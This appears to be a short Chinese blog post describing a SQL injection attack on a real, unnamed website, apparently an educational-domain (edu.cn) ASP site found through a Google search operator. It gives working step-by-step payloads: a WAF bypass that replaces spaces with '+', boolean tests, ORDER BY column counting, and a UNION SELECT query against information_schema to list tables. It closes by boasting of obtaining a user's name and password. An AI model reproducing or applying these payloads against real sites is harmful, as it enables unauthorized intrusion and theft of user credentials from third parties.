SQL注入某网站绕过WTS-WAF
谷歌搜索inurl:edu.cn asp .
发现了某网站,在查询的数字后面加了个'就报错了,我心想他可能存在注入漏洞.
然后开始尝试
?id=35 and 1=1#
被拦截了
没想到将空格换成+就过了,设置的太不严密了
?id=35+and+1=1+#
显示信息
?id=35+and+1=2+#
没信息,可见存在数字型注入
?id=35+order+by+1#
,显示信息
?id=35+order+by+2#
不显示信息,可见字段名有1个
?id=-1+union+select+1#
显示可用字段名为第一个
显示出用户表名
?id=-1+union+select+table_name+from%20information_schema.tables%20where%20table_schema=database()+limit+6,1#
接下来不演示了,SQL注入的老套路
获取的某个用户名,竟然是进行攻击的,哈哈哈
某个用户的密码